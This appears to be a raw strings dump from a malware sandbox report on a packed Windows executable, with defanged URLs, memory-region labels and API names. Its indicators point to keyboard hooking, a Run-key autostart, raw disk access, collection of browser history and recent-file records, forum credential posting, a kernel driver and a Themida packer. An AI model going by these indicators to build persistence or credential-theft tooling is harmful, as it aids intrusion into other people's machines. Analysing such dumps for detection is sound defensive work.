MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
F%u3H
2991425581
Adobe Photoshop CS3 Windows
2009:08:19 14:57:14
(7),01444
'9=82<.342
*.fI%
-%U:.
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:exif="hXXp://ns.adobe.com/exif/1.0/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/" xmlns:xap="hXXp://ns.adobe.com/xap/1.0/" xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" exif:PixelXDimension="1024" exif:PixelYDimension="768" exif:ColorSpace="1" exif:NativeDigest="36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;45FED0AF54E1433340F00752D6A3D635" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" photoshop:History="" tiff:Orientation="1" tiff:XResolution="3000000/10000" tiff:YResolution="3000000/10000" tiff:ResolutionUnit="2" tiff:NativeDigest="256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;62F64FD90F0739B59885FB768EE20B8B" xap:CreateDate="2009-08-19T14:57:14 08:00" xap:ModifyDate="2009-08-19T14:57:14 08:00" xap:MetadataDate="2009-08-19T14:57:14 08:00" xap:CreatorTool="Adobe Photoshop CS3 Windows" xapMM:InstanceID="uuid:885F00228D8CDE118EB7A346E2032144" xapMM:DocumentID="uuid:875F00228D8CDE118EB7A346E2032144" dc:format="image/jpeg">
<xapMM:DerivedFrom stRef:instanceID="uuid:197875df-872b-11de-ba98-bd54df554615" stRef:documentID="uuid:73DB04B79785DE11B7389DA10F272B01"/>
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
=.mKP
v8%U7
Msg|s
.hRIjRd
%Si)Y
OM.MCJ
,.Rd_
.ymyB
xa.tvp
EE&x%S
.LD*vk
mz.cT
>S.tGuy
.kkeu
2%.xE
b).de^c
$poQ%Uy
~.kz%
.Wi?_
hXXp://VVV.yxbsq.com/list.asp?classid=29
.comment {color:green}
Copyright 2013-2016 VVV.yxbsq.com
keye
eJ.nM'iZJ1p
>w.yA)
qku'%.UkF
.XZqw|
S/y.aV
.rJjJ2
.WNsq
M.OkJ
q.tYO
s7.Yk4
e7%SIM(
F.RrW
VurL[
y-%sm:{
.Ee.NK
kz%x$
eV.PvJ1
b%FoZJms
.GzmJ
.[;=%d
&'.XN_
5.mRJ2
s$.Lr2<L
.EwxB)
{o.KI.
#:6%f
pz?F%F
.jUQJ
;GE.YM
N2u%x
*.VwK
#J.jt
9%sXj.R
7.hA;A
%7u G
I  .yZK
.h.We
WRiJ5!%d
E.YF7
F.MrM
nj.wJ
qf.Hi
OGy.IBW
?u.ni
ZM9.Bm
IVtT!.gh
$%F~|
!u.jr
8M{U.YE
$.Fwn |
.Ni^IJrK
i.nzr
%ut]7
.Vm)7
wR.IAJ
%UF-(S
.U.ys
.jRNO
I%uwh(
Sn i%Dm
999%d
.JRuc
.kZJJJ2iFn
.VpN\
E.kZnRG
wR.jOI%iy
.SI%(
.Uui.(b
{N./K.eU
 vn.ZJ
%9s^6
%u%gOY5}
iI^.su
N.Gm:R
.mZmZRrO
n.IE;
=\%9U
(J.MI~
\[N.RT
Ko8#D%x]
y.nm5
).nuj2
I.gnw Z
8%u.^Y>Uy
)J.RR
i.NWg
.Yi=b
.nmp~!x
M.USI:q
^.NQQ
\.fEba
VF%S{
.jPpJ
u.kY;~
sN.POM'
.ZghZf
.ysBM
M9%%x
R.MNQ
.INJR
.i'.iTQ^
J1I8.iAs%9j
%.eJ/
7.WNI
.Zn1N
yAI.YS^
.Unu8
!%xs8
.iJFN
.nkM-d
F.ryb
#V.QM
9#.ks
.ZqqMIF
%RIOG.eR
(.guh
9.Ra"0d
.XB->X
.rJQnQ
~(J.RW;
QIY'k.um\
/-%U^s
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
EnumChildWindows
comdlg32.dll
WINSPOOL.DRV
WINMM.dll
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
exui.dll
exui_yuansukeyouziji_kuozhanjiekou
RegOpenKeyA
OLEPRO32.DLL
ATL.DLL
CreateDialogIndirectParamA
oledlg.dll
dult.fne
dult_DICkey
dult_Usbkey
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
MSWHEEL_ROLLMSG
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
its:%s::%s
VVV.dywt.com.cn
index.dat
desktop.ini
TermType%d
Service%d
Machine%d
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
\e161255a-37c3-11d2-bcaa-00c04fd929db
\Data\e161255a-37c3-11d2-bcaa-00c04fd929db
Software\Microsoft\Internet Explorer\TypedURLs
%d%d%d
rundll32.exe shell32.dll,
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
eapi.fne
(link.ini)
extra_args=/NODEFAULTLIB:"LIBC.LIB"
extra_args=/NODEFAULTLIB:"EAPI_STATIC.LIB"
extra_args=/NODEFAULTLIB:"mysql_static.lib"
2:33544711
VVV.exui.cc
bbs.exui.cc =====
ryxzxzw@163.com
2014. 08.30.1
\lib\ex_ui\AttributeEditorexui.dll
ex_ui keye
msimg32.dll
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7" xmpMM:DocumentID="xmp.did:A0B65855870011E2AFB69C04A7201614" xmpMM:InstanceID="xmp.iid:A0B65854870011E2AFB69C04A7201614" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22F24EC22D86E211815A8FDDD6268239" stRef:documentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
11/15/11
VVV.meitu.com
4@{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
lib\ex_ui\AttributeEditorexui.dll
Ole32.dll
GdiPlus.dll
imm32.dll
program internal error number is %d.
%s%x.tmp
:"%s"
:"%s".
.?AVCCmdTarget@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr>
<tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr>
<tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr>
<table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>
burlywood
\winhlp32.exe
?e.exe
ai8vplaydl.dllSystem32\
.sxdata
SETUPAPI.dll
HID.DLL
Ry4S.dll
Rockey
ReadReport %d
WriteReport %d
SETPASSWORD 2,handle %4x
SETPASSWORD 1,handle %4x buffer:%s
Rockey4Smart
hXXp://bbs.dult.cn/
VVV.dult.cn
bbs.dult.cn
\my.sys
Usbkey
DICkey
software\microsoft\windows\CurrentVersion\Run\QQ
explorer.exe
hXXp://bbs.dult.cn/thread-10567-1-1.html
Getcpuid
<4,$?7/'
(3-!0,1'8"5.*2$
\COOKIE.ini
hXXp://bbs.dult.cn/
/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login&loginhash=LcOKW&inajax=1
&password=
home.php?mod=spacecp&ac=profile&op=verify
hXXp://bbs.dult.cn
hXXp://ec.dult.cn (
hXXp://bbs.dult.cn/thread-5456-1-1.html
hXXp://bbs.dult.cn/home.php?mod=spacecp&ac=credit&op=buy
258013246!
HTTP://
application/x-www-form-urlencoded
hXXp://forum.4bpa.com/forum.php
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Opera/9.80 (Windows NT 5.0; U; zh-cn) Presto/2.9.168 Version/11.50
thread-10002-1-1.html
forum.php?mod=misc&action=attachcredit&aid=7078&formhash=
D@VBScript.RegExp
ai8vplaydl.dll
.PAVCUserException@@
.PAVCOleException@@
.PAVCResourceException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
user.asp
Host: qxw1001940641.my3w.com
aaa.exe
bcdedit.exe
winload.exe
winload.efi
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\passkpp
\Device\passkpp
1.0.0.0
ntoskrnl!KeDelayExecutionThread
%s is followed by %s.
Any HTTP store must be the last store in the list.
%s: not available
You must agree to the Terms of Use to access the microsoft.com symbol site
%s - filename cannot exceed 100 characters
http:
https:
store %s - %s
winhttp
error 0x%x
file.ptr
%s - file not found
Error:This Network path is an invalid UNC path: '%s'
Error:This Network path is not supported UNC path: '%s'
Error: Ping the '%s' host failed
LZCopy() not found in module LZ32.DLL
LZClose() not found in module LZ32.DLL
LZOpenFileA() not found in module LZ32.DLL
LZInit() not found in module LZ32.DLL
InternetConnectW() not found in module WININET.DLL
InternetOpenW() not found in module WININET.DLL
HttpOpenRequestW() not found in module WININET.DLL
InternetCloseHandle() not found in module WININET.DLL
InternetReadFile() not found in module WININET.DLL
HttpQueryInfoW() not found in module WININET.DLL
HttpSendRequestW() not found in module WININET.DLL
InternetErrorDlg() not found in module WININET.DLL
InternetQueryDataAvailable() not found in module WININET.DLL
InternetQueryOptionW() not found in module WININET.DLL
WinHttpOpen() not found in module WINHTTP.DLL
WinHttpCloseHandle() not found in module WINHTTP.DLL
WinHttpReadData() not found in module WINHTTP.DLL
WinHttpSendRequest() not found in module WINHTTP.DLL
WinHttpQueryOption() not found in module WINHTTP.DLL
wvsprintfW() not found in module USER32.DLL
GetDeskTopWindow() not found in module USER32.DLL
SetWindowPos() not found in module USER32.DLL
ReleaseDC() not found in module USER32.DLL
GetDC() not found in module USER32.DLL
GetWindowRect() not found in module USER32.DLL
PostMessageA() not found in module USER32.DLL
GetDlgItem() not found in module USER32.DLL
SetDlgItemTextA() not found in module USER32.DLL
DialogBoxParamW() not found in module USER32.DLL
wsprintfW() not found in module USER32.DLL
GetDeviceCaps() not found in module GDI32.DLL
SymSrvTimeoutTimer_%s
%s re-enabled
%s from %s: %ld bytes -
SYMSRV: The file.ptr file message is: %s
%s disabled for %d minutes because of %d timeouts in %d minutes
Can't create %s
%s from %s: uncompressed
download.error
pingme.txt
%s - drive not ready
%s - access is denied
wantsptr.txt
index2.txt
flat.txt
%s?%s
symsrv.tmp
Exclusion section in %s is too large. Use the registry
%s is in the file exclusion list
symsrv.no
symsrv.yes
microsoft.com
SYMSRV: File: %s
SYMSRV: Get File Path: %s
SYMSRV: Connecting to the Server: %s.
Restarting connection to %s for %s
WinInet Interface using proxy server: %s
WinHttp interface using proxy server: %s
%s: 0x%x - %s
Server: '%s' Error
6.3.9600.16384 (debuggers(dbg).130821-1623)
symsrv.dll
Windows
Operating System
HTTP File Request
OverloadedOperator
HasAssignmentOperator
HasCastOperator
$T2 $esp = $T0 .raSearchStart = $eip $T0 ^ = $esp $T0 4   = $ebp $ebp = $ebx $ebx =
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4   =
$T0 .raSearch 4 - = $ebp $T0 ^ = $eip $T0 4   ^ = $esp $T0 8   =
$T2 $esp = $T0 .raSearchStart =
' line %d)
SYMSRV.DLL*
The module signature does not match with .pdb signature
Unable to locate the .pdb file in any of the symbol search path locations.
Unable to locate the .pdb file in any of the symbol search
This error indicates attempting to access a .pdb file with
The .pdb file contains a corrupted debug codeview information.
You may be attempting to access a .pdb file with read-only attributes
or you do not have access permission to the .pdb location.
This error indicates a .pdb file related failure.
The module signature does not match with .pdb signature.
The module age and .pdb age do not match.
Invalid executable image
The image has not been recognized as a valid executable.
Unable to locate the .pdb file in this location
in the symbol search path (.sympath).
the requested password input.
is an invalid UNC store (an invalid path or the pingme.txt file is
or there is an invalid store type (other than UNC/http/https).
The SYMSRV client failed while reading/parsing the file.ptr file
The operation timed out
The URL does not use a recognized protocol
An extended error was returned from the WinHttp server
The .pdb file is probably no longer indexed in the symbol server share location.
The .sympath token is an invalid path, or you do not have
Symbol indexed but no file exists
The symbol server has never indexed any version of this symbol file
No version of the .pdb file with the given name has ever been registered.
This means that the file has not been indexed on the symbol server,
probably the file has been only indexed locally (no by the hXXp://symweb).
The symbol server has never indexed this version of this symbol file
Other versions of this symbol file have been indexed but this specific version has not.
Symbol expired - this symbol file was indexed but is no longer available
Symbol expired - this symbol file was previously indexed
The Symbol server sent an unknown failure message in the file.ptr - MSG: XXXX
Please contact the debugger team to report this error. (Mail: DAT-triage).
An Exception happened while downloading the module .pdb
No longer indexed
%s 0x%x - %s : %s
%s 0x%x - %s
%s - This error is unknown: 0x%x. Please contact the debugger team to report this error. (Mail: DAT-triage)
........ DIA E_PDB_FILE_SYSTEM error from %u
invalid executable image
pdb error 0x%x
dia error 0x%x
%s - %s
%s%s%s%s\*
%s%s%s%s\%s
%s%s%s%s\%s%s
Invalid path: '%s'
Ping command failed on: '%s'
The following %s did not respond and were excluded during symbol loading:
%-22.22s %s
Bin Path: %s
Symbol Path:%s
You should also verify that your symbol search path (.sympath) is correct.
Downloading symbols for [%s] %s
An Exception happened in the function GetPdbThreadProc(): 0x%x
%s%s%s
Error: Invalid Path length: %s.
Error: Unable to create the Image pdb data structure: '%s'
Error: Unable to create the validation thread for: '%s'
%s mismatched pdb for %s
........DeleteFile(%u,%ws)
........RemoveDirectory(%u,%ws)
%s %s
Symbol loading cancelled: %s
diaQueryInlineFrameTrace(%x,%u)(%I64x,%x,%u,%u,%u)(%I64x,%u,%u)
diaCompareInline(%d)(%I64x,%x)(%I64x)(%d,%d,%d)(%d,%d)
get_symTag(%x)
SYMSRV: %s is not a valid store
SYMSRV: %s needs a downstream store
SymSrv.dll load failure
DBGHELP_WINHTTP
Unable to find the SymbolServerWEx() function in srmsrv.dll. You should upgrade the symsrv.dll binary.
Unable to find the SymbolServerPingWEx() function in srmsrv.dll. You should upgrade the symsrv.dll binary.
\winxp\triage.ini
hXXp://symweb
hXXp://msdl.microsoft.com/download/symbols
*hXXp://symweb
*hXXp://msdl.microsoft.com/download/symbols
SymSrv load failure: %s
Can't use symbol server for %s - no header information available
%s*%s
srcsrv.dll
%s is not source indexed
Error 0x%x grabbing source in %s
Source server error - %s
Need a newer version of srcsrv.dll
Error 0x%x enumerating source tokens in %s
%s cached to %s
%s already cached
Failed copying the file '%s' to the cache
error 0x%x opening %s
new session: %s
%sDBG%d.tmp
_NT_SYMBOL_PATH: %s
_NT_ALT_SYMBOL_PATH: %s
Symbol Search Path: %s
SymAddrIncludeInlineTrace(%u,%I64x,%s)
SymAddrIncludeInlineTrace(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymAddrIncludeInlineTrace(Exception(%x),%I64x)
SymQueryInlineTrace(%c,%s)(%I64x,%x)(%I64x,%x,%u)
SymQueryInlineTrace(%c,%s)(%I64x,INLINE_FRAME_CONTEXT_IGNORE)(%I64x,%x,%u)
SymQueryInlineTrace(ERROR_INVALID_PROCESS,%I64x,%x,%I64x,%I64x)
SymQueryInlineTrace(Exception(%x),%I64x,%x,%I64x,%I64x)
SymCompareInlineTrace(%d,%I64x,%x,%I64x,%s)
SymCompareInlineTrace(%d)(%I64x,%x,%s,%I64x)(%I64x,%s,%I64x)
SymCompareInlineTrace(%d)(%I64x,%x,%I64x)(%I64x,%I64x)
SymCompareInlineTrace_Addr1(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace_RetAddr1(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace_Addr2(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace(ERROR_INVALID_PROCESS,%I64x,%x,%I64x,%I64x,%I64x)
SymCompareInlineTrace(Exception(%x),%I64x,%x,%I64x)
%s - mismatched
%s - OK
%s - mismatched timestamp
%s - mismatched timestamp OK
%s found
%s not found in %s
%s%s%s.dbg
%ws%ws_XXXXXXXXXXX%X_X_XX
........CreateDirectory(%u,%ws)
%ws%ws_XXXXXXXXXXX%X_X_XX\%ws
........CopyFile(%u,%ws,%ws)
%s is already loaded at %I64x
No base address for %s: Please specify
No header for %s. Searching for image on disk
%s is stripped. Searching for dbg file
No header for %s. Searching for dbg file
No debug info for %s. Searching for dbg file
%s missing debug info. Searching for pdb anyway
coff symbols %s
cv symbols %s
private symbols %s
public symbols %s
, source indexed
, not source indexed
export symbols
MOD: %s
unrecognized OMF sig: %x %c%c%c%c
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix
%s%s%s%s
000000000
%ws.%ws,%u.%u.%u.%u
\StringFileInfo\xx\%s
DbsSplayTreeRangeMap::Add: ignoring zero-sized range at %s
DbsSplayTreeRangeMap::Add: range %s:%I64x overflows, truncating
DbsSplayTreeRangeMap::Add: Conflicting region %s - %s
Base relocation RVA %x not in image
Invalid relocation block size 0x%x
Unknown base relocation type %d
Base relocation entry RVA %x not in image
Raw relocation entry offset %x not in buffer
Map %s:
Image region %x:%x does not fit in mapping
Unable to map %s region at %s, %s
WARNING: Image %s section %d extends outside of image bounds
netmsg.dll
$T0 .raSearchStart = $eip $T0 ^ = $esp $T0 4   = $ebp $T0
Windows Image Helper
DBGHELP.DLL
5.1.0.0
HDPlug.dll
1, 0, 6, 6
- Skin.dll
windows dll Library
1, 4, 12, 723
windows.dll
Copyright (C) 2001-2012 windows Co.,Ltd.
windows
windows 7.dll

%original file name%.exe_1612_rwx_01220000_003DF000:

%System%\ADVAPI32.dll
%userappdata%\RestartApp.exe
Exit Status = %d
SER32.dll
ADVAPI32.dll
NTDLL.dll
3Cannot write oreans.vxd
\Oreans.vxd
$\3<$1<$3<$\
ADVAPI32.DLL
oreans32.sys
oreansx64.sys
\\.\oreans32
\\.\Global\oreans32
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
3Cannot open oreans.vxd driver. Make sure that oreans.vxd
\\.\Oreans.vxd
%s\Oreans.vxd
contact info@oreans.com for this error
winmm.dll
^3<$1<$3<$\
CheckIN = %d
CheckOUT = %d
ProcIN = %d
ProcOUT = %d
ExitIN = %d
ExitOUT = %d
TPin = %d
HWIn = %d
IntV = %x, %x, %x, %x
3An internal exception occurred (Address: 0x%x)
Please, contact yoursite@yoursite.com. Thank you!
%original file name%.exe
3Cannot find '%s'. Please, re-install this application
hntdll.dll

%original file name%.exe_1612_rwx_01D30000_000F2000:

.text
`.data
.rsrc
@.reloc
ntdll.dll
KERNEL32.dll
BaseCleanupAppcompatCacheSupport
BaseInitAppcompatCacheSupport
BaseProcessInitPostImport
CallNamedPipeA
CallNamedPipeW
CmdBatNotification
ConnectNamedPipe
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeW
CreatePipe
DisconnectNamedPipe
GetCPFileNameFromRegistry
GetCPInfo
GetCPInfoExA
GetCPInfoExW
GetConsoleAliasExesA
GetConsoleAliasExesLengthA
GetConsoleAliasExesLengthW
GetConsoleAliasExesW
GetConsoleInputExeNameA
GetConsoleInputExeNameW
GetConsoleKeyboardLayoutNameA
GetConsoleKeyboardLayoutNameW
GetConsoleOutputCP
GetDefaultSortkeySize
GetLargestConsoleWindowSize
GetNamedPipeHandleStateA
GetNamedPipeHandleStateW
GetNamedPipeInfo
GetProcessHandleCount
GetProcessHeap
GetProcessHeaps
GetProcessShutdownParameters
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryW
PeekNamedPipe
RegisterWowExec
SetCPGlobal
SetConsoleInputExeNameA
SetConsoleInputExeNameW
SetConsoleKeyShortcuts
SetConsoleMaximumWindowSize
SetConsoleOutputCP
SetNamedPipeHandleState
SetProcessShutdownParameters
SetThreadExecutionState
TransactNamedPipe
VDMConsoleOperation
VDMOperationStarted
WaitNamedPipeA
WaitNamedPipeW
WinExec
NTDLL.RtlAddVectoredExceptionHandler
NTDLL.RtlDecodePointer
NTDLL.RtlDecodeSystemPointer
NTDLL.RtlDeleteCriticalSection
NTDLL.RtlEncodePointer
NTDLL.RtlEncodeSystemPointer
NTDLL.RtlEnterCriticalSection
NTDLL.RtlGetLastWin32Error
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
NTDLL.RtlReAllocateHeap
NTDLL.RtlSizeHeap
NTDLL.RtlInitializeSListHead
NTDLL.RtlInterlockedFlushSList
NTDLL.RtlInterlockedPopEntrySList
NTDLL.RtlInterlockedPushEntrySList
NTDLL.RtlLeaveCriticalSection
NTDLL.RtlQueryDepthSList
NTDLL.RtlRemoveVectoredExceptionHandler
NTDLL.RtlRestoreLastWin32Error
NTDLL.RtlCaptureContext
NTDLL.RtlCaptureStackBackTrace
NTDLL.RtlFillMemory
NTDLL.RtlMoveMemory
NTDLL.RtlUnwind
NTDLL.RtlZeroMemory
NTDLL.RtlSetCriticalSectionSpinCount
NTDLL.RtlSetLastWin32Error
NTDLL.RtlTryEnterCriticalSection
NTDLL.VerSetConditionMask
DirOperationControl
UrlCanonicalizeW
SHDeleteKeyW
PathCreateFromUrlW
SetProcessWindowStation
OpenWindowStationA
GetProcessWindowStation
EnumDesktopWindows
CloseWindowStation
twain_32.dll
Jt.HH;
midiOutShortMsg
SXS: %s() LdrFindOutOfProcessResource failed; nt status = lx
advapi32.dll
ReportEventW
RegSaveKeyW
RegSaveKeyExW
RegSaveKeyA
RegRestoreKeyW
RegQueryInfoKeyW
RegOpenKeyW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
RegNotifyChangeKeyValue
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyExW
RegCloseKey
ElfReportEventW
CryptExportKey
CryptDestroyKey
\Device\NamedPipe\Win32Pipes.x.x
CM_Open_DevNode_Key
CryptCATCatalogInfoFromContext
SetPortW
EnumPrinterKeyW
EnumPortsW
DeletePrinterKeyW
DeletePortW
ConfigurePortW
AddPortW
ShellExecuteW
ShellExecuteExW
ShellExecuteExA
ShellExecuteA
SHFileOperationW
SHFileOperationA
FindExecutableW
FindExecutableA
ImportPrivacySettings
MprConfigTransportGetInfo
MprConfigTransportGetHandle
MprConfigTransportDelete
MprConfigTransportCreate
MprConfigInterfaceTransportRemove
MprConfigInterfaceTransportGetInfo
MprConfigInterfaceTransportGetHandle
MprConfigInterfaceTransportEnum
MprConfigInterfaceTransportAdd
MprAdminTransportCreate
MprAdminPortGetInfo
MprAdminPortEnum
MprAdminInterfaceTransportAdd
MimeOleParseMhtmlUrl
ImmGetVirtualKey
ImageGetCertificateHeader
ImageGetCertificateData
ImageEnumerateCertificates
GdiplusShutdown
|CAGetCertTypePropertyEx
CAGetCertTypeProperty
CAGetCertTypeKeySpec
CAGetCertTypeFlagsEx
CAGetCertTypeFlags
CAGetCertTypeExtensionsEx
CAGetCertTypeExtensions
CAGetCertTypeExpiration
CAGetCACertificate
CAFreeCertTypeProperty
CAFreeCertTypeExtensions
CAFindCertTypeByName
CAEnumNextCertType
CAEnumCertTypesForCAEx
CAEnumCertTypesForCA
CACountCertTypes
CACloseCertType
CACertTypeAccessCheck
ApphelpCheckExe
WZCPassword2Key
EapcfgNodeFromKey
SetupDiOpenDevRegKey
SetupDiCreateDevRegKeyW
SXS: %s() BasepSxsCreateStreams() failed
winlogon.EXE
PWVSSh
SXS: %s - Failing thread create because RtlActivateActivationContextEx() failed with status lx
SXS: %s - Failing thread create because RtlQueryInformationActivationContext() failed with status lx
SXS: %s - Failing thread create becuase NtQueryInformationThread() failed with status lx
u\SSh
kernel32: No mapping for ImageInformation.Machine == x
TermsrvLogInstallIniFile
TermsrvGetWindowsDirectoryW
TermsrvGetWindowsDirectoryA
SXS: %s failing because RtlQueryInformationActivationContext() returned status lx
SXS: %s - Failure getting active activation context; ntstatus lx
SXS: %s() LdrAccessOutOfProcessResource failed; nt status = lx
SXS: %s() LdrCreateOutOfProcessImage failed
SXS: %s() NtQueryInformationFile failed
SXS: %s() empty lpSource %ls
SXS: %s() Calling csrss server failed
SXS: %s() RtlMultiAppendUnicodeStringBuffer failed
SXS: %s() NtMapViewOfSection failed
SXS: %s() AssemblyDirectory is not null terminated
SXS: %s() BaseDllMapResourceIdW failed
SXS: %s() ACTCTX_FLAG_RESOURCE_NAME_VALID set but lpResourceName == 0
SXS: %s() Bad lpAssemblyDirectory %ls
SXS: %s() Bad lpSource PathType %ls, 0x%lx
SXS: %s() Bad lpAssemblyDirectory PathType %ls, 0x%lx
SXS: %s() bad wProcessorArchitecture 0x%x
SXS: Invalid parameter(s) passed to FindActCtxSection*()
->cbSize = %u
SXS: %s() CsrCaptureMessageMultiUnicodeStringsInPlace failed
QSSSSh
\twain_32.dll
ReportFault
SXS: %s() NtCreateSection() failed
SXS: %s() NtOpenFile(%wZ) failed
SXS: %s() Null %p or size 0x%lx too small
SXS: %s() Bad flags/size 0x%lx/0x%lx
.debug
.reloc
.rsrc1
|wzcsapi.dll
wzcdlg.dll
wtsapi32.dll
ws2_32.dll
wmvcore.dll
wmi.dll
wldap32.dll
wintrust.dll
winsta.dll
winspool.drv
winscard.dll
winmm.dll
wininet.dll
winhttp.dll
version.dll
uxtheme.dll
utildll.dll
usp10.dll
userenv.dll
user32.dll
urlmon.dll
tapi32.dll
syssetup.dll
sti.dll
shsvcs.dll
shlwapi.dll
shell32.dll
shdocvw.dll
sfc.dll
setupapi.dll
secur32.dll
scecli.dll
samlib.dll
rtutils.dll
rpcrt4.dll
regapi.dll
rasman.dll
rasdlg.dll
rasapi32.dll
query.dll
pstorec.dll
psapi.dll
printui.dll
powrprof.dll
pidgen.dll
pautoenr.dll
oleaut32.dll
oleacc.dll
ole32.dll
odbc32.dll
ocmanage.dll
ntmarta.dll
ntlsapi.dll
ntlanman.dll
ntdsapi.dll
ntdsa.dll
netshell.dll
netrap.dll
netplwiz.dll
netman.dll
netcfgx.dll
netapi32.dll
mswsock.dll
mssign32.dll
msrating.dll
msimg32.dll
msi.dll
mshtml.dll
msgina.dll
mscat32.dll
msacm32.dll
mprui.dll
mprapi.dll
mpr.dll
mobsync.dll
mlang.dll
lz32.dll
linkinfo.dll
keymgr.dll
kdcsvc.dll
iphlpapi.dll
inetcomm.dll
imm32.dll
imgutil.dll
imagehlp.dll
hnetcfg.dll
gdiplus.dll
gdi32.dll
esent.dll
efsadu.dll
duser.dll
dnsapi.dll
